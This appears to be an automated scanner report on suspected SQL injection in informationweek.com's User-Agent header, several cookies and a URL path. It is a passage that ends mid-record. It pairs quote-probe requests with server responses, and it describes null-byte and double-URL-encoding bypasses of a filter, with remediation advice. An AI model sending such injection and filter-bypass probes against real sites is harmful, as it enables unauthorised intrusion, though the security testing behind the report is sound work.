GET /video/security%2527%2527/20979809001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:22:20 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:20 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security%2527%2527/20979809001&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /video/security/21090964001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:21:41 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:41 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 67777
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... <span>Although a few Network Access Control players have begun to fail and exit the market, StillSecure is going strong. We caught up with Chief Strategist Alan Shimmel at Interop 2008 in Las Vegas.</span> ...[SNIP]...
Request 2
GET /video/security/21090964001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'' Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:21:42 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:42 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 38477
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]...
The ebNewBandWidth_.www.informationweek.com cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ebNewBandWidth_.www.informationweek.com cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /video/security/21090964001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333%00'; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:21:29 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:29 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 68296
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... <span>Although a few Network Access Control players have begun to fail and exit the market, StillSecure is going strong. We caught up with Chief Strategist Alan Shimmel at Interop 2008 in Las Vegas.</span> ...[SNIP]...
Request 2
GET /video/security/21090964001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333%00''; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:21:31 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:31 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 38475
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]...
The s_lv cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_lv cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /video/security/21090964001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529%00'; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:21:14 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:14 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 68296
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... <span>Although a few Network Access Control players have begun to fail and exit the market, StillSecure is going strong. We caught up with Chief Strategist Alan Shimmel at Interop 2008 in Las Vegas.</span> ...[SNIP]...
Request 2
GET /video/security/21090964001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529%00''; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:21:15 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:15 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security/21090964001&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The s_nr cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_nr cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the s_nr cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /video/security/21090964001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120%2527; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:21:26 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:26 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 68296
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... <span>Although a few Network Access Control players have begun to fail and exit the market, StillSecure is going strong. We caught up with Chief Strategist Alan Shimmel at Interop 2008 in Las Vegas.</span> ...[SNIP]...
Request 2
GET /video/security/21090964001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120%2527%2527; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:21:27 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:27 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security/21090964001&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The s_sq cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_sq cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /video/security/21090964001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D'; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:21:24 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:24 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 68296
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... <span>Although a few Network Access Control players have begun to fail and exit the market, StillSecure is going strong. We caught up with Chief Strategist Alan Shimmel at Interop 2008 in Las Vegas.</span> ...[SNIP]...
Request 2
GET /video/security/21090964001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D''; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:21:25 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:25 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security/21090964001&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The iwkbtn_emc_101111 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iwkbtn_emc_101111 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /video/security/44865844001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541%00'; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:21:09 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:09 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 68311
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... <span>Although a few Network Access Control players have begun to fail and exit the market, StillSecure is going strong. We caught up with Chief Strategist Alan Shimmel at Interop 2008 in Las Vegas.</span> ...[SNIP]...
Request 2
GET /video/security/44865844001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541%00''; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:21:10 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:10 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security/44865844001&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The s_lv cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_lv cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /video/security/44865844001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529'; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:20:59 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:59 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 68311
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... <span>Although a few Network Access Control players have begun to fail and exit the market, StillSecure is going strong. We caught up with Chief Strategist Alan Shimmel at Interop 2008 in Las Vegas.</span> ...[SNIP]...
Request 2
GET /video/security/44865844001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529''; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:21:00 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:00 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 38480
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]...
The s_nr cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_nr cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /video/security/44865844001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120%00'; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:21:16 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:16 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 68311
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... <span>Although a few Network Access Control players have begun to fail and exit the market, StillSecure is going strong. We caught up with Chief Strategist Alan Shimmel at Interop 2008 in Las Vegas.</span> ...[SNIP]...
Request 2
GET /video/security/44865844001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120%00''; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:21:17 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:17 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security/44865844001&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /video%2527/security/68553969001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:32 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:32 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30326
<!-- <DROPLET SRC="nopagefound.jhtml"></DROPLET> --> <!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var fo ...[SNIP]... <p class="StoryContentColor">The URL (Web address) that has been entered is directing to a non-existent page on the InformationWeek.com website. Please check that there are no typographical errors in the URL. If the URL is correct, then <a href="http://www.informationweek.com/contactus.jhtml;jsessionid=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN#onlineprod"> ...[SNIP]...
Request 2
GET /video%2527%2527/security/68553969001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
